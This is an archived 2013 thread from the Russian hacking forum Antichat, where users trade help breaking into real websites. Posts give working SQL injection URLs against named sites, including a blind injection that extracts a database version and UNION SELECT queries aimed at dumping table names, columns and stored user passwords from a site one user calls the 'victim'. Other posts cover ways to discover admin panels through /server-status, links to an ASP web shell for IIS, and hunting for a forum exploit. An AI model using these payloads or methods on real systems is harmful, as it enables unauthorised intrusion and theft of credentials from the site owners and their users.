ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

04.07.2013, 19:50
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
Сообщение от BigBear
BigBear said:
Ты только адрес админ-панели максимум выловишь.
Не, ну если авторизация идёт через GET - То да, поймаешь аутентификационные данные.
А так, максимум - адрес админ панели.
Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?
|
|
|
|

05.07.2013, 08:43
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме: 69033
Репутация:
8
|
|
Сообщение от Br@!ns
Br@!ns said:
Именно так, запросы и через GET тоже идут. Вот и хотелось бы все эти постояннообновляющиеся запросы куда нибудь логировать или парсить в режиме реального времени, возможно ли это как нибудь сделать?
Ну тебе никто не мешает цеплять на страницу /server-status и парсить её содержимое. Хоть запарся.
Единственное что - ты увидешь все запросы как от клиентов, так и от админов, а если сайт высокопосещаемый, то этих запросов будут тысячи, миллионы, сможешь ли ты выловить иголку в стоге сена ???
Самое простое - дождаться когда админ будет в сети, напечатать мат к любой новости и пожаловаться на него. И ждать пока админ его почистит, при этом мониторить /server-status. Если комментарии удаляются через админку - есть шанс увидеть её адрес.
|
|
|

06.07.2013, 01:53
|
|
Guest
Сообщений: n/a
Провел на форуме: 1049
Репутация:
0
|
|
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar= 237760&repairRelam=fun
что мне с теперь можно с этим делать?
это случайно не скуль инъекция?
прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом
|
|
|
|

06.07.2013, 16:20
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от HACKTEAM
HACKTEAM said:
ходел исправить чара и наткнулся вот на это http://wow-cool.ru/?ajaxZone=1&module=chars&action=repair&repairChar= 237760&repairRelam=fun
что мне с теперь можно с этим делать?
это случайно не скуль инъекция?
прошу не кидать в меня помидорами т.к. я ещё не очень разбираюсь в этом
ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать
http://forum.wow-cool.ru/admin/upgrade/index.php?app=upgrade&s=§ion=index&do=login
|
|
|
|

08.07.2013, 04:27
|
|
Новичок
Регистрация: 17.06.2010
Сообщений: 0
Провел на форуме: 430
Репутация:
0
|
|
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов
|
|
|

08.07.2013, 05:29
|
|
Guest
Сообщений: n/a
Провел на форуме: 29591
Репутация:
8
|
|
Сообщение от zeoman
zeoman said:
Возможно не сюда запостил ищу веб шел .ASP веб сервер IIS функционал скромный заливка и правка файлов
/showthread.php?t=103576
https://rdot.org/forum/showthread.php?t=1116
|
|
|
|

08.07.2013, 12:31
|
|
Guest
Сообщений: n/a
Провел на форуме: 179197
Репутация:
25
|
|
http://hawk.ru/toto.php?n_nomer=-3
Можно ли по этой ошибке чо нибудь получить?
|
|
|
|

08.07.2013, 13:28
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Br@!ns
Br@!ns said:
http://hawk.ru/toto.php?n_nomer=-3
Можно ли по этой ошибке чо нибудь получить?
Можно блиндом получить
http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select %20ord(substr(@@version,1,1))%20)=53
5.0.51-log
|
|
|
|

09.07.2013, 04:44
|
|
Guest
Сообщений: n/a
Провел на форуме: 0
Репутация:
0
|
|
help
Сообщение от asiaman
asiaman said:
Подскажите, кто-нибудь пользовался данной багой?
Если наглядный пример использования?
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1180
Nginx buffer underflow vulnerability
Buffer underflow in src/http/ngx_http_parse.c in nginx 0.1.0 through 0.5.37, 0.6.x before 0.6.39, 0.7.x before 0.7.62, and 0.8.x before 0.8.15 allows remote attackers to execute arbitrary code via crafted HTTP requests.
Affected items
Web Server
The impact of this vulnerability
Remote attackers may execute arbitrary code via crafted HTTP requests.
актуально, что можно с этим сделать
|
|
|
|

10.07.2013, 01:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 555
Репутация:
0
|
|
Подскажите:
жертва - ttp://www.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=16
узнаю названия таблиц - ttp://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(table_name),3,4,5,6 from information_schema.tables where table_schema=database()
узнаю название столбцов - http://terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(column_name),3,4,5,6 from information_schema.columns where table_schema=database()
на выходе имею такую связку (таблица - user, столбцы - userName,userPass)
ww.terrapex.ca/en/realisation.php?larealisation=Environmental+Compli ance+Audit&id=-16 union select 1,group_concat(userPass),3,4,5,6 from users
и получаю:
Invalid query: Unknown column 'userPass' in 'field list'
Уязвимость разбираю из соседнего раздела /threadnav21336-1550-10.html - нашел её YaBTR и вот вариант рабочий:
ttp://www.terrapex.ca/en/nouvelle.php?lanouvelle=&id=22+union+select+1,grou p_concat(userpwd,0x3a,user rights),version(),4,5+from+users--
Где и как найти эти userpwd,0x3a,user rights
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|